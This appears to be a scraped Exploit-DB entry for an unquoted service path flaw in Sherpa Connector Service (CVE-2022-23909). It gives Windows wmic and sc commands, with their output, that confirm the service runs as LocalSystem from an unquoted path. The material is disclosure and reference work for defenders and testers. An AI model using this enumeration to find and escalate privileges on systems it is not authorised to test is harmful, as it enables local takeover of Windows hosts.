50cc2edafe
9 changes to exploits/shellcodes Sherpa Connector Service v2020.2.20328.2050 - Unquoted Service Path binutils 2.37 - Objdump Segmentation Fault Kramer VIAware - Remote Code Execution (RCE) (Root) Opmon 9.11 - Cross-site Scripting Zenario CMS 9.0.54156 - Remote Code Execution (RCE) (Authenticated) KLiK Social Media Website 1.0 - 'Multiple' SQLi minewebcms 1.15.2 - Cross-site Scripting (XSS) qdPM 9.2 - Cross-site Request Forgery (CSRF) ICEHRM 31.0.0.0S - Cross-site Request Forgery (CSRF) to Account Deletion
36 lines
No EOL
1.2 KiB
Text
36 lines
No EOL
1.2 KiB
Text
# Exploit Title: Sherpa Connector Service v2020.2.20328.2050 - Unquoted Service Path
|
|
# Exploit Author: Manthan Chhabra (netsectuna), Harshit (fumenoid)
|
|
# Version: 2020.2.20328.2050
|
|
# Date: 02/04/2022
|
|
# Vendor Homepage: http://gimmal.com/
|
|
# Vulnerability Type: Unquoted Service Path
|
|
# Tested on: Windows 10
|
|
# CVE: CVE-2022-23909
|
|
|
|
|
|
# Step to discover Unquoted Service Path:
|
|
|
|
C:\>wmic service get name,displayname,pathname,startmode | findstr /i
|
|
"sherpa" | findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v
|
|
"""
|
|
|
|
Sherpa Connector Service
|
|
Sherpa Connector Service C:\Program
|
|
Files\Sherpa Software\Sherpa Connector\SherpaConnectorService.exe
|
|
Auto
|
|
|
|
C:\>sc qc "Sherpa Connector Service"
|
|
|
|
[SC] QueryServiceConfig SUCCESS
|
|
|
|
SERVICE_NAME: Sherpa Connector Service
|
|
TYPE : 10 WIN32_OWN_PROCESS
|
|
START_TYPE : 2 AUTO_START
|
|
ERROR_CONTROL : 1 NORMAL
|
|
BINARY_PATH_NAME : C:\Program Files\Sherpa Software\Sherpa
|
|
Connector\SherpaConnectorService.exe
|
|
LOAD_ORDER_GROUP :
|
|
TAG : 0
|
|
DISPLAY_NAME : Sherpa Connector Service
|
|
DEPENDENCIES : wmiApSrv
|
|
SERVICE_START_NAME : LocalSystem |